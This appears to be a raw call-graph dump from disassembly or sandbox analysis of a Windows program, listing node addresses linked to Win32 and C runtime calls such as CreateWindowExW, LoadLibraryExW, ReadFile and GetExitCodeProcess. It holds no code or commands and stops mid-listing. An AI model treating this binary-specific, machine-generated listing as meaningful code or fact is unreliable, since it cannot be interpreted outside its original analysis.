100931->102304 100934 313b34 100936 3139d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 100934->100936 100935 34d26a 100936->100791 100938 354cc3 100937->100938 100950 3209f5 100937->100950 102361 379e4a 89 API calls 4 library calls 100938->102361 100940 320ce4 100941 320cfa 100940->100941 102358 321070 10 API calls Mailbox 100940->102358 100941->100798 100944 320ee4 100944->100941 100946 320ef1 100944->100946 100945 320a4b PeekMessageW 100975 320a05 Mailbox 100945->100975 102359 321093 331 API calls Mailbox 100946->102359 100949 320ef8 LockWindowUpdate DestroyWindow GetMessageW 100949->100941 100950->100975 102362 319e5d 60 API calls 100950->102362 102363 366349 331 API calls 100950->102363 100951 354e81 Sleep 100951->100975 100956 354d50 TranslateAcceleratorW 100957 320e43 PeekMessageW 100956->100957 100956->100975 100957->100975 100958 320ea5 TranslateMessage DispatchMessageW 100958->100957 100959 320d13 timeGetTime 100959->100975 100960 35581f WaitForSingleObject 100962 35583c GetExitCodeProcess CloseHandle 100960->100962 100960->100975 100967 320f95 100962->100967 100963 320e5f Sleep 100983 320e70 Mailbox 100963->100983 100964 318047 59 API calls 100964->100975 100965 317667 59 API calls 100965->100983 100966 330db6 59 API calls Mailbox 100966->100975 100967->100798 100968 355af8 Sleep 100968->100983 100971 33049f timeGetTime 100971->100983 100972 320f4e timeGetTime 102360 319e5d 60 API calls 100972->102360 100975->100940 100975->100945 100975->100951 100975->100956 100975->100957 100975->100958 100975->100959 100975->100960 100975->100963 100975->100964 100975->100966 100975->100967 100975->100968 100975->100972 100975->100983 100986 319e5d 60 API calls 100975->100986 100995 319ea0 304 API calls 100975->100995 100999 317de1 59 API calls 100975->100999 101002 379e4a 89 API calls 100975->101002 101003 319c90 59 API calls Mailbox 100975->101003 101004 3184c0 69 API calls 100975->101004 101005 31b73c 304 API calls 100975->101005 101007 36617e 59 API calls Mailbox 100975->101007 101008 3189b3 69 API calls 100975->101008 101009 3555d5 VariantClear 100975->101009 101010 366e8f 59 API calls 100975->101010 101011 35566b VariantClear 100975->101011 101012 355419 VariantClear 100975->101012 101013 318cd4 59 API calls Mailbox 100975->101013 102305 31e6a0 100975->102305 102336 31f460 100975->102336 102355 31e420 331 API calls 100975->102355 102356 31fce0 331 API calls 2 library calls 100975->102356 102357 3131ce IsDialogMessageW GetClassLongW 100975->102357 102364 396018 59 API calls 100975->102364 102365 379a15 59 API calls Mailbox 100975->102365 102366 36d4f2 59 API calls 100975->102366 102367 319837 100975->102367 102385 3660ef 59 API calls 2 library calls 100975->102385 102386 318401 59 API calls 100975->102386 102387 3182df 59 API calls Mailbox 100975->102387 100976 355b8f GetExitCodeProcess 100981 355ba5 WaitForSingleObject 100976->100981 100982 355bbb CloseHandle 100976->100982 100979 395f25 110 API calls 100979->100983 100980 31b7dd 109 API calls 100980->100983 100981->100975 100981->100982 100982->100983 100983->100965 100983->100967 100983->100971 100983->100975 100983->100976 100983->100979 100983->100980 100985 355874 100983->100985 100987 355c17 Sleep 100983->100987 100988 355078 Sleep 100983->100988 100989 317de1 59 API calls 100983->100989 102388 372408 60 API calls 100983->102388 102389 319e5d 60 API calls 100983->102389 102390 3189b3 69 API calls Mailbox 100983->102390 102391 31b73c 331 API calls 100983->102391 102392 3664da 60 API calls 100983->102392 102393 375244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 100983->102393 102394 373c55 66 API calls Mailbox 100983->102394 100985->100967 100986->100975 100987->100975 100988->100975 100989->100983 100995->100975 100999->100975 101002->100975 101003->100975 101004->100975 101005->100975 101007->100975 101008->100975 101009->100975 101010->100975 101011->100975 101012->100975 101013->100975 101014->100799 101015->100775 101016->100787 101018 341940 __write_nolock 101017->101018 101019 314713 GetModuleFileNameW 101018->101019 101020 317de1 59 API calls 101019->101020 101021 314739 101020->101021 101022 314750 60 API calls 101021->101022 101023 314743 Mailbox 101022->101023 101023->100794 101025 317df0 __NMSG_WRITE _memmove 101024->101025 101026 330db6 Mailbox 59 API calls 101025->101026 101027 317e2e 101026->101027 101027->100800 101029 313d3e __write_nolock 101028->101029 101030 317bcc 59 API calls 101029->101030 101035 313ea4 Mailbox 101029->101035 101032 313d70 101030->101032 101041 313da6 Mailbox 101032->101041 101150 3179f2 101032->101150 101033 3179f2 59 API calls 101033->101041 101034 313e77 101034->101035 101036 317de1 59 API calls 101034->101036 101035->100820 101038 313e98 101036->101038 101037 317de1 59 API calls 101037->101041 101039 313f74 59 API calls 101038->101039 101039->101035 101041->101033 101041->101034 101041->101035 101041->101037 101153 313f74 101041->101153 101159 314bb5 101042->101159 101047 34d8e6 101050 314e4a 84 API calls 101047->101050 101048 314e08 LoadLibraryExW 101169 314b6a 101048->101169 101052 34d8ed 101050->101052 101054 314b6a 3 API calls 101052->101054 101056 34d8f5 101054->101056 101055 314e2f 101055->101056 101057 314e3b 101055->101057 101195 314f0b 101056->101195 101059 314e4a 84 API calls 101057->101059 101061 3137d4 101059->101061 101061->100827 101061->100828 101063 34d91c 101203 314ec7 101063->101203 101065 34d929 101067 330db6 Mailbox 59 API calls 101066->101067 101068 3137fb 101067->101068 101068->100841 101071 3184cb 101069->101071 101070 3184f2 101070->100845 101071->101070 101633 3189b3 69 API calls Mailbox 101071->101633 101074 313ef3 101073->101074 101075 313eda 101073->101075 101076 317bcc 59 API calls 101074->101076 101077 318047 59 API calls 101075->101077 101078 313879 101076->101078 101077->101078 101079 332efd 101078->101079 101080 332f09 101079->101080 101081 332f7e 101079->101081 101088 332f2e 101080->101088 101634 338b28 58 API calls __getptd_noexit 101080->101634 101636 332f90 60 API calls 3 library calls 101081->101636 101084 332f8b 101084->100866 101085 332f15 101635 338db6 9 API calls __filbuf 101085->101635 101087 332f20 101087->100866 101088->100866 101090 3192d6 101089->101090 101091 330db6 Mailbox 59 API calls 101090->101091 101092 3192e4 101091->101092 101094 313924 101092->101094 101637 3191fc 59 API calls Mailbox 101092->101637 101095 319050 101094->101095 101638 319160 101095->101638 101097 330db6 Mailbox 59 API calls 101098 313932 101097->101098 101100 318ee0 101098->101100 101099 31905f 101099->101097 101099->101098 101101 34f17c 101100->101101 101106 318ef7 101100->101106 101101->101106 101648 318bdb 59 API calls Mailbox 101101->101648 101103 318fff 101103->100894 101104 319040 101647 319d3c 60 API calls Mailbox 101104->101647 101105 318ff8 101107 330db6 Mailbox 59 API calls 101105->101107 101106->101103 101106->101104 101106->101105 101107->101103 101110 314ee5 85 API calls 101109->101110 101111 3795ca 101110->101111 101649 379734 101111->101649 101114 314f0b 74 API calls 101115 3795f7 101114->101115 101116 314f0b 74 API calls 101115->101116 101117 379607 101116->101117 101118 314f0b 74 API calls 101117->101118 101119 379622 101118->101119 101120 314f0b 74 API calls 101119->101120 101121 37963d 101120->101121 101122 314ee5 85 API calls 101121->101122 101123 379654 101122->101123 101124 33571c __malloc_crt 58 API calls 101123->101124 101125 37965b 101124->101125 101126 33571c __malloc_crt 58 API calls 101125->101126 101127 379665 101126->101127 101128 314f0b 74 API calls 101127->101128 101129 379679 101128->101129 101130 379109 GetSystemTimeAsFileTime 101129->101130 101131 37968c 101130->101131 101132 3796b6 101131->101132 101133 3796a1 101131->101133 101135 3796bc 101132->101135 101136 37971b 101132->101136 101134 332d55 _free 58 API calls 101133->101134 101137 3796a7 101134->101137 101655 378b06 101135->101655 101139 332d55 _free 58 API calls 101136->101139 101140 332d55 _free 58 API calls 101137->101140 101142 34d186 101139->101142 101140->101142 101142->100831 101144 314e4a 101142->101144 101143 332d55 _free 58 API calls 101143->101142 101145 314e54 101144->101145 101147 314e5b 101144->101147 101146 3353a6 __fcloseall 83 API calls 101145->101146 101146->101147 101148 314e7b FreeLibrary 101147->101148 101149 314e6a 101147->101149 101148->101149 101149->100831 101151 317e4f 59 API calls 101150->101151 101152 3179fd 101151->101152 101152->101032 101154 313f82 101153->101154 101158 313fa4 _memmove 101153->101158 101157 330db6 Mailbox 59 API calls 101154->101157 101155 330db6 Mailbox 59 API calls 101156 313fb8 101155->101156 101156->101041 101157->101158 101158->101155 101208 314c03 101159->101208 101162 314c03 2 API calls 101165 314bdc 101162->101165 101163 314bf5 101166 33525b 101163->101166 101164 314bec FreeLibrary 101164->101163 101165->101163 101165->101164 101212 335270 101166->101212 101168 314dfc 101168->101047 101168->101048 101370 314c36 101169->101370 101172 314b8f 101173 314ba1 FreeLibrary 101172->101173 101174 314baa 101172->101174 101173->101174 101176 314c70 101174->101176 101175 314c36 2 API calls 101175->101172 101177 330db6 Mailbox 59 API calls 101176->101177 101178 314c85 101177->101178 101374 31522e 101178->101374 101180 314c91 _memmove 101181 314ccc 101180->101181 101182 314dc1 101180->101182 101183 314d89 101180->101183 101184 314ec7 69 API calls 101181->101184 101388 37991b 95 API calls 101182->101388 101377 314e89 CreateStreamOnHGlobal 101183->101377 101190 314cd5 101184->101190 101187 314f0b 74 API calls 101187->101190 101188 314d69 101188->101055 101190->101187 101190->101188 101191 34d8a7 101190->101191 101383 314ee5 101190->101383 101192 314ee5 85 API calls 101191->101192 101193 34d8bb 101192->101193 101194 314f0b 74 API calls 101193->101194 101194->101188 101196 34d9cd 101195->101196 101197 314f1d 101195->101197 101412 3355e2 101197->101412 101200 379109 101610 378f5f 101200->101610 101202 37911f 101202->101063 101204 34d990 101203->101204 101205 314ed6 101203->101205 101615 335c60 101205->101615 101207 314ede 101207->101065 101209 314bd0 101208->101209 101210 314c0c LoadLibraryA 101208->101210 101209->101162 101209->101165 101210->101209 101211 314c1d GetProcAddress 101210->101211 101211->101209 101215 33527c type_info::_Type_info_dtor 101212->101215 101213 33528f 101261 338b28 58 API calls __getptd_noexit 101213->101261 101215->101213 101217 3352c0 101215->101217 101216 335294 101262 338db6 9 API calls __filbuf 101216->101262 101231 3404e8 101217->101231 101220 3352c5 101221 3352db 101220->101221 101222 3352ce 101220->101222 101224 335305 101221->101224 101225 3352e5 101221->101225 101263 338b28 58 API calls __getptd_noexit 101222->101263 101246 340607 101224->101246 101264 338b28 58 API calls __getptd_noexit 101225->101264 101228 33529f type_info::_Type_info_dtor @_EH4_CallFilterFunc@8 101228->101168 101232 3404f4 type_info::_Type_info_dtor 101231->101232 101233 339c0b __lock 58 API calls 101232->101233 101240 340502 101233->101240 101234 340576 101266 3405fe 101234->101266 101235 34057d 101271 33881d 58 API calls __malloc_crt 101235->101271 101238 3405f3 type_info::_Type_info_dtor 101238->101220 101239 340584 101239->101234 101272 339e2b InitializeCriticalSectionAndSpinCount 101239->101272 101240->101234 101240->101235 101242 339c93 __mtinitlocknum 58 API calls 101240->101242 101269 336c50 59 API calls __lock 101240->101269 101270 336cba LeaveCriticalSection LeaveCriticalSection _doexit 101240->101270 101242->101240 101244 3405aa EnterCriticalSection 101244->101234 101254 340627 __wopenfile 101246->101254 101247 340641 101277 338b28 58 API calls __getptd_noexit 101247->101277 101249 340646 101278 338db6 9 API calls __filbuf 101249->101278 101251 34085f 101274 3485a1 101251->101274 101252 335310 101265 335332 LeaveCriticalSection LeaveCriticalSection _fseek 101252->101265 101254->101247 101257 3407fc 101254->101257 101279 3337cb 60 API calls 2 library calls 101254->101279 101256 3407f5 101256->101257 101280 3337cb 60 API calls 2 library calls 101256->101280 101257->101247 101257->101251 101259 340814 101259->101257 101281 3337cb 60 API calls 2 library calls 101259->101281 101261->101216 101262->101228 101263->101228 101264->101228 101265->101228 101273 339d75 LeaveCriticalSection 101266->101273 101268 340605 101268->101238 101269->101240 101270->101240 101271->101239 101272->101244 101273->101268 101282 347d85 101274->101282 101276 3485ba 101276->101252 101277->101249 101278->101252 101279->101256 101280->101259 101281->101257 101283 347d91 type_info::_Type_info_dtor 101282->101283 101284 347da7 101283->101284 101287 347ddd 101283->101287 101367 338b28 58 API calls __getptd_noexit 101284->101367 101286 347dac 101368 338db6 9 API calls __filbuf 101286->101368 101293 347e4e 101287->101293 101290 347df9 101369 347e22 LeaveCriticalSection __unlock_fhandle 101290->101369 101292 347db6 type_info::_Type_info_dtor 101292->101276 101294 347e6e 101293->101294 101295 3344ea __wsopen_nolock 58 API calls 101294->101295 101298 347e8a 101295->101298 101296 338dc6 __invoke_watson 8 API calls 101297 3485a0 101296->101297 101300 347d85 __wsopen_helper 103 API calls 101297->101300 101299 347ec4 101298->101299 101310 347ee7 101298->101310 101366 347fc1 101298->101366 101301 338af4 __commit 58 API calls 101299->101301 101302 3485ba 101300->101302 101303 347ec9 101301->101303 101302->101290 101304 338b28 __filbuf 58 API calls 101303->101304 101305 347ed6 101304->101305 101307 338db6 __filbuf 9 API calls 101305->101307 101306 347fa5 101308 338af4 __commit 58 API calls 101306->101308 101309 347ee0 101307->101309 101311 347faa 101308->101311 101309->101290 101310->101306 101315 347f83 101310->101315 101312 338b28 __filbuf 58 API calls 101311->101312 101313 347fb7 101312->101313 101314 338db6 __filbuf 9 API calls 101313->101314 101314->101366 101316 33d294 __alloc_osfhnd 61 API calls 101315->101316 101317 348051 101316->101317 101318 34807e 101317->101318 101319 34805b 101317->101319 101321 347cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101318->101321 101320 338af4 __commit 58 API calls 101319->101320 101322 348060 101320->101322 101329 3480a0 101321->101329 101324 338b28 __filbuf 58 API calls 101322->101324 101323 34811e GetFileType 101327 348129 GetLastError 101323->101327 101328 34816b 101323->101328 101326 34806a 101324->101326 101325 3480ec GetLastError 101330 338b07 __dosmaperr 58 API calls 101325->101330 101331 338b28 __filbuf 58 API calls 101326->101331 101332 338b07 __dosmaperr 58 API calls 101327->101332 101338 33d52a __set_osfhnd 59 API calls 101328->101338 101329->101323 101329->101325 101333 347cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101329->101333 101334 348111 101330->101334 101331->101309 101335 348150 CloseHandle 101332->101335 101337 3480e1 101333->101337 101340 338b28 __filbuf 58 API calls 101334->101340 101335->101334 101336 34815e 101335->101336 101339 338b28 __filbuf 58 API calls 101336->101339 101337->101323 101337->101325 101342 348189 101338->101342 101341 348163 101339->101341 101340->101366 101341->101334 101343 348344 101342->101343 101344 3418c1 __lseeki64_nolock 60 API calls 101342->101344 101351 34820a 101342->101351 101345 348517 CloseHandle 101343->101345 101343->101366 101346 3481f3 101344->101346 101347 347cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101345->101347 101348 338af4 __commit 58 API calls 101346->101348 101346->101351 101350 34853e 101347->101350 101348->101351 101349 340e5b 70 API calls __read_nolock 101349->101351 101352 348546 GetLastError 101350->101352 101359 348572 101350->101359 101351->101343 101351->101349 101355 340add __close_nolock 61 API calls 101351->101355 101356 34823c 101351->101356 101360 33d886 __write 78 API calls 101351->101360 101361 3483c1 101351->101361 101362 3418c1 60 API calls __lseeki64_nolock 101351->101362 101353 338b07 __dosmaperr 58 API calls 101352->101353 101354 348552 101353->101354 101357 33d43d __free_osfhnd 59 API calls 101354->101357 101355->101351 101356->101351 101358 3497a2 __chsize_nolock 82 API calls 101356->101358 101357->101359 101358->101356 101359->101366 101360->101351 101363 340add __close_nolock 61 API calls 101361->101363 101362->101351 101364 3483c8 101363->101364 101365 338b28 __filbuf 58 API calls 101364->101365 101365->101366 101366->101296 101367->101286 101368->101292 101369->101292 101371 314b83 101370->101371 101372 314c3f LoadLibraryA 101370->101372 101371->101172 101371->101175 101372->101371 101373 314c50 GetProcAddress 101372->101373 101373->101371 101375 330db6 Mailbox 59 API calls 101374->101375 101376 315240 101375->101376 101376->101180 101378 314ea3 FindResourceExW 101377->101378 101382 314ec0 101377->101382 101379 34d933 LoadResource 101378->101379 101378->101382 101380 34d948 SizeofResource 101379->101380 101379->101382 101381 34d95c LockResource 101380->101381 101380->101382 101381->101382 101382->101181 101384 314ef4 101383->101384 101385 34d9ab 101383->101385 101389 33584d 101384->101389 101387 314f02 101387->101190 101388->101181 101390 335859 type_info::_Type_info_dtor 101389->101390 101391 33586b 101390->101391 101393 335891 101390->101393 101402 338b28 58 API calls __getptd_noexit 101391->101402 101404 336c11 101393->101404 101394 335870 101403 338db6 9 API calls __filbuf 101394->101403 101397 335897 101410 3357be 83 API calls 4 library calls 101397->101410 101399 3358a6 101411 3358c8 LeaveCriticalSection LeaveCriticalSection _fseek 101399->101411 101401 33587b type_info::_Type_info_dtor 101401->101387 101402->101394 101403->101401 101405 336c43 EnterCriticalSection 101404->101405 101406 336c21 101404->101406 101409 336c39 101405->101409 101406->101405 101407 336c29 101406->101407 101408 339c0b __lock 58 API calls 101407->101408 101408->101409 101409->101397 101410->101399 101411->101401 101415 3355fd 101412->101415 101414 314f2e 101414->101200 101416 335609 type_info::_Type_info_dtor 101415->101416 101417 33561f _memset 101416->101417 101418 33564c 101416->101418 101419 335644 type_info::_Type_info_dtor 101416->101419 101442 338b28 58 API calls __getptd_noexit 101417->101442 101420 336c11 __lock_file 59 API calls 101418->101420 101419->101414 101422 335652 101420->101422 101428 33541d 101422->101428 101423 335639 101443 338db6 9 API calls __filbuf 101423->101443 101432 335438 _memset 101428->101432 101434 335453 101428->101434 101429 335443 101540 338b28 58 API calls __getptd_noexit 101429->101540 101431 335448 101541 338db6 9 API calls __filbuf 101431->101541 101432->101429 101432->101434 101439 335493 101432->101439 101444 335686 LeaveCriticalSection LeaveCriticalSection _fseek 101434->101444 101436 3355a4 _memset 101543 338b28 58 API calls __getptd_noexit 101436->101543 101439->101434 101439->101436 101445 3346e6 101439->101445 101452 340e5b 101439->101452 101520 340ba7 101439->101520 101542 340cc8 58 API calls 3 library calls 101439->101542 101442->101423 101443->101419 101444->101419 101446 3346f0 101445->101446 101447 334705 101445->101447 101544 338b28 58 API calls __getptd_noexit 101446->101544 101447->101439 101449 3346f5 101545 338db6 9 API calls __filbuf 101449->101545 101451 334700 101451->101439 101453 340e93 101452->101453 101454 340e7c 101452->101454 101455 3415cb 101453->101455 101459 340ecd 101453->101459 101555 338af4 58 API calls __getptd_noexit 101454->101555 101571 338af4 58 API calls __getptd_noexit 101455->101571 101458 340e81 101556 338b28 58 API calls __getptd_noexit 101458->101556 101462 340ed5 101459->101462 101470 340eec 101459->101470 101460 3415d0 101572 338b28 58 API calls __getptd_noexit 101460->101572 101557 338af4 58 API calls __getptd_noexit 101462->101557 101465 340ee1 101573 338db6 9 API calls __filbuf 101465->101573 101466 340e88 101466->101439 101467 340eda 101558 338b28 58 API calls __getptd_noexit 101467->101558 101469 340f01 101559 338af4 58 API calls __getptd_noexit 101469->101559 101470->101466 101470->101469 101471 340f1b 101470->101471 101475 340f39 101470->101475 101471->101469 101474 340f26 101471->101474 101546 345c6b 101474->101546 101560 33881d 58 API calls __malloc_crt 101475->101560 101477 340f49 101479 340f51 101477->101479 101480 340f6c 101477->101480 101561 338b28 58 API calls __getptd_noexit 101479->101561 101563 3418c1 60 API calls 3 library calls 101480->101563 101481 34103a 101484 3410b3 ReadFile 101481->101484 101485 341050 GetConsoleMode 101481->101485 101487 3410d5 101484->101487 101488 341593 GetLastError 101484->101488 101489 341064 101485->101489 101490 3410b0 101485->101490 101486 340f56 101562 338af4 58 API calls __getptd_noexit 101486->101562 101487->101488 101496 3410a5 101487->101496 101492 341093 101488->101492 101493 3415a0 101488->101493 101489->101490 101494 34106a ReadConsoleW 101489->101494 101490->101484 101503 341099 101492->101503 101564 338b07 58 API calls 3 library calls 101492->101564 101569 338b28 58 API calls __getptd_noexit 101493->101569 101494->101496 101497 34108d GetLastError 101494->101497 101502 34110a 101496->101502 101496->101503 101506 341377 101496->101506 101497->101492 101499 3415a5 101570 338af4 58 API calls __getptd_noexit 101499->101570 101501 332d55 _free 58 API calls 101501->101466 101505 341176 ReadFile 101502->101505 101513 3411f7 101502->101513 101503->101466 101503->101501 101508 341197 GetLastError 101505->101508 101518 3411a1 101505->101518 101506->101503 101507 34147d ReadFile 101506->101507 101512 3414a0 GetLastError 101507->101512 101519 3414ae 101507->101519 101508->101518 101509 3412b4 101514 341264 MultiByteToWideChar 101509->101514 101567 3418c1 60 API calls 3 library calls 101509->101567 101510 3412a4 101566 338b28 58 API calls __getptd_noexit 101510->101566 101512->101519 101513->101503 101513->101509 101513->101510 101513->101514 101514->101497 101514->101503 101518->101502 101565 3418c1 60 API calls 3 library calls 101518->101565 101519->101506 101568 3418c1 60 API calls 3 library calls 101519->101568 101521 340bb2 101520->101521 101525 340bc7 101520->101525 101607 338b28 58 API calls __getptd_noexit 101521->101607 101523 340bb7 101608 338db6 9 API calls __filbuf 101523->101608 101526 340bfc 101525->101526 101534 340bc2 101525->101534 101609 345fe4 58 API calls __malloc_crt 101525->101609 101528 3346e6 __filbuf 58 API calls 101526->101528 101529 340c10 101528->101529 101574 340d47 101529->101574 101531 340c17 101532 3346e6 __filbuf 58 API calls 101531->101532 101531->101534 101533 340c3a 101532->101533 101533->101534 101535 3346e6 __filbuf 58 API calls 101533->101535 101534->101439 101536 340c46 101535->101536 101536->101534 101537 3346e6 __filbuf 58 API calls 101536->101537 101538 340c53 101537->101538 101539 3346e6 __filbuf 58 API calls 101538->101539 101539->101534 101540->101431 101541->101434 101542->101439 101543->101431 101544->101449 101545->101451 101547 345c76 101546->101547 101548 345c83 101546->101548 101549 338b28 __filbuf 58 API calls 101547->101549 101551 345c8f 101548->101551 101552 338b28 __filbuf 58 API calls 101548->101552 101550 345c7b 101549->101550 101550->101481 101551->101481 101553 345cb0 101552->101553 101554 338db6 __filbuf 9 API calls 101553->101554 101554->101550 101555->101458 101556->101466 101557->101467 101558->101465 101559->101467 101560->101477 101561->101486 101562->101466 101563->101474 101564->101503 101565->101518 101566->101503 101567->101514 101568->101519 101569->101499 101570->101503 101571->101460 101572->101465 101573->101466 101575 340d53 type_info::_Type_info_dtor 101574->101575 101576 340d77 101575->101576 101577 340d60 101575->101577 101579 340e3b 101576->101579 101582 340d8b 101576->101582 101578 338af4 __commit 58 API calls 101577->101578 101581 340d65 101578->101581 101580 338af4 __commit 58 API calls 101579->101580 101583 340dae 101580->101583 101584 338b28 __filbuf 58 API calls 101581->101584 101585 340db6 101582->101585 101586 340da9 101582->101586 101592 338b28 __filbuf 58 API calls 101583->101592 101599 340d6c type_info::_Type_info_dtor 101584->101599 101587 340dc3 101585->101587 101588 340dd8 101585->101588 101589 338af4 __commit 58 API calls 101586->101589 101590 338af4 __commit 58 API calls 101587->101590 101591 33d206 ___lock_fhandle 59 API calls 101588->101591 101589->101583 101593 340dc8 101590->101593 101594 340dde 101591->101594 101595 340dd0 101592->101595 101596 338b28 __filbuf 58 API calls 101593->101596 101597 340e04 101594->101597 101598 340df1 101594->101598 101601 338db6 __filbuf 9 API calls 101595->101601 101596->101595 101602 338b28 __filbuf 58 API calls 101597->101602 101600 340e5b __read_nolock 70 API calls 101598->101600 101599->101531 101603 340dfd 101600->101603 101601->101599 101604 340e09 101602->101604 101606 340e33 __read LeaveCriticalSection 101603->101606 101605 338af4 __commit 58 API calls 101604->101605 101605->101603 101606->101599 101607->101523 101608->101534 101609->101526 101613 33520a GetSystemTimeAsFileTime 101610->101613 101612 378f6e 101612->101202 101614 335238 __aulldiv 101613->101614 101614->101612 101616 335c6c type_info::_Type_info_dtor 101615->101616 101617 335c93 101616->101617 101618 335c7e 101616->101618 101620 336c11 __lock_file 59 API calls 101617->101620 101629 338b28 58 API calls __getptd_noexit 101618->101629 101622 335c99 101620->101622 101621 335c83 101630 338db6 9 API calls __filbuf 101621->101630 101631 3358d0 67 API calls 5 library calls 101622->101631 101625 335ca4 101632 335cc4 LeaveCriticalSection LeaveCriticalSection _fseek 101625->101632 101626 335c8e type_info::_Type_info_dtor 101626->101207 101628 335cb6 101628->101626 101629->101621 101630->101626 101631->101625 101632->101628 101633->101070 101634->101085 101635->101087 101636->101084 101637->101094 101639 319169 Mailbox 101638->101639 101640 34f19f 101639->101640 101645 319173 101639->101645 101641 330db6 Mailbox 59 API calls 101640->101641 101643 34f1ab 101641->101643 101642 31917a 101642->101099 101645->101642 101646 319c90 59 API calls Mailbox 101645->101646 101646->101645 101647->101103 101648->101106 101654 379748 __tzset_nolock _wcscmp 101649->101654 101650 3795dc 101650->101114 101650->101142 101651 314f0b 74 API calls 101651->101654 101652 379109 GetSystemTimeAsFileTime 101652->101654 101653 314ee5 85 API calls 101653->101654 101654->101650 101654->101651 101654->101652 101654->101653 101656 378b11 101655->101656 101657 378b1f 101655->101657 101658 33525b 115 API calls 101656->101658 101659 378b64 101657->101659 101660 33525b 115 API calls 101657->101660 101682 378b28 101657->101682 101658->101657 101686 378d91 101659->101686 101662 378b49 101660->101662 101662->101659 101663 378b52 101662->101663 101667 3353a6 __fcloseall 83 API calls 101663->101667 101663->101682 101664 378ba8 101665 378bcd 101664->101665 101666 378bac 101664->101666 101690 3789a9 101665->101690 101669 378bb9 101666->101669 101671 3353a6 __fcloseall 83 API calls 101666->101671 101667->101682 101674 3353a6 __fcloseall 83 API calls 101669->101674 101669->101682 101671->101669 101672 378bfb 101699 378c2b 101672->101699 101673 378bdb 101675 378be8 101673->101675 101678 3353a6 __fcloseall 83 API calls 101673->101678 101674->101682 101680 3353a6 __fcloseall 83 API calls 101675->101680 101675->101682 101678->101675 101680->101682 101682->101143 101683 378c16 101683->101682 101685 3353a6 __fcloseall 83 API calls 101683->101685 101685->101682 101687 378db6 101686->101687 101689 378d9f __tzset_nolock _memmove 101686->101689 101688 3355e2 __fread_nolock 74 API calls 101687->101688 101688->101689 101689->101664 101691 33571c __malloc_crt 58 API calls 101690->101691 101692 3789b8 101691->101692 101693 33571c __malloc_crt 58 API calls 101692->101693 101694 3789cc 101693->101694 101695 33571c __malloc_crt 58 API calls 101694->101695 101696 3789e0 101695->101696 101697 378d0d 58 API calls 101696->101697 101698 3789f3 101696->101698 101697->101698 101698->101672 101698->101673 101703 378c40 101699->101703 101700 378cf8 101732 378f35 101700->101732 101701 378a05 74 API calls 101701->101703 101703->101700 101703->101701 101706 378c02 101703->101706 101728 378e12 101703->101728 101736 378aa1 74 API calls 101703->101736 101707 378d0d 101706->101707 101708 378d1a 101707->101708 101711 378d20 101707->101711 101709 332d55 _free 58 API calls 101708->101709 101709->101711 101710 378d31 101713 378c09 101710->101713 101714 332d55 _free 58 API calls 101710->101714 101711->101710 101712 332d55 _free 58 API calls 101711->101712 101712->101710 101713->101683 101715 3353a6 101713->101715 101714->101713 101716 3353b2 type_info::_Type_info_dtor 101715->101716 101717 3353c6 101716->101717 101718 3353de 101716->101718 101785 338b28 58 API calls __getptd_noexit 101717->101785 101721 336c11 __lock_file 59 API calls 101718->101721 101727 3353d6 type_info::_Type_info_dtor 101718->101727 101720 3353cb 101786 338db6 9 API calls __filbuf 101720->101786 101723 3353f0 101721->101723 101769 33533a 101723->101769 101727->101683 101729 378e21 101728->101729 101730 378e61 101728->101730 101729->101703 101730->101729 101737 378ee8 101730->101737 101733 378f42 101732->101733 101734 378f53 101732->101734 101735 334863 80 API calls 101733->101735 101734->101706 101735->101734 101736->101703 101738 378f14 101737->101738 101739 378f25 101737->101739 101741 334863 101738->101741 101739->101730 101742 33486f type_info::_Type_info_dtor 101741->101742 101743 3348a5 101742->101743 101744 33488d 101742->101744 101745 33489d type_info::_Type_info_dtor 101742->101745 101746 336c11 __lock_file 59 API calls 101743->101746 101766 338b28 58 API calls __getptd_noexit 101744->101766 101745->101739 101748 3348ab 101746->101748 101754 33470a 101748->101754 101749 334892 101767 338db6 9 API calls __filbuf 101749->101767 101757 334719 101754->101757 101761 334737 101754->101761 101755 334727 101756 338b28 __filbuf 58 API calls 101755->101756 101758 33472c 101756->101758 101757->101755 101757->101761 101763 334751 _memmove 101757->101763 101759 338db6 __filbuf 9 API calls 101758->101759 101759->101761 101760 33ae1e __flsbuf 78 API calls 101760->101763 101768 3348dd LeaveCriticalSection LeaveCriticalSection _fseek 101761->101768 101762 334a3d __flush 78 API calls 101762->101763 101763->101760 101763->101761 101763->101762 101764 3346e6 __filbuf 58 API calls 101763->101764 101765 33d886 __write 78 API calls 101763->101765 101764->101763 101765->101763 101766->101749 101767->101745 101768->101745 101770 335349 101769->101770 101771 33535d 101769->101771 101824 338b28 58 API calls __getptd_noexit 101770->101824 101772 335359 101771->101772 101788 334a3d 101771->101788 101787 335415 LeaveCriticalSection LeaveCriticalSection _fseek 101772->101787 101775 33534e 101825 338db6 9 API calls __filbuf 101775->101825 101780 3346e6 __filbuf 58 API calls 101781 335377 101780->101781 101798 340a02 101781->101798 101783 33537d 101783->101772 101784 332d55 _free 58 API calls 101783->101784 101784->101772 101785->101720 101786->101727 101787->101727 101789 334a50 101788->101789 101790 334a74 101788->101790 101789->101790 101791 3346e6 __filbuf 58 API calls 101789->101791 101794 340b77 101790->101794 101792 334a6d 101791->101792 101826 33d886 101792->101826 101795 335371 101794->101795 101796 340b84 101794->101796 101795->101780 101796->101795 101797 332d55 _free 58 API calls 101796->101797 101797->101795 101799 340a0e type_info::_Type_info_dtor 101798->101799 101800 340a32 101799->101800 101801 340a1b 101799->101801 101803 340abd 101800->101803 101805 340a42 101800->101805 101951 338af4 58 API calls __getptd_noexit 101801->101951 101956 338af4 58 API calls __getptd_noexit 101803->101956 101804 340a20 101952 338b28 58 API calls __getptd_noexit 101804->101952 101808 340a60 101805->101808 101809 340a6a 101805->101809 101953 338af4 58 API calls __getptd_noexit 101808->101953 101812 33d206 ___lock_fhandle 59 API calls 101809->101812 101810 340a65 101957 338b28 58 API calls __getptd_noexit 101810->101957 101814 340a70 101812->101814 101816 340a83 101814->101816 101817 340a8e 101814->101817 101815 340ac9 101958 338db6 9 API calls __filbuf 101815->101958 101936 340add 101816->101936 101954 338b28 58 API calls __getptd_noexit 101817->101954 101821 340a27 type_info::_Type_info_dtor 101821->101783 101822 340a89 101955 340ab5 LeaveCriticalSection __unlock_fhandle 101822->101955 101824->101775 101825->101772 101827 33d892 type_info::_Type_info_dtor 101826->101827 101828 33d8b6 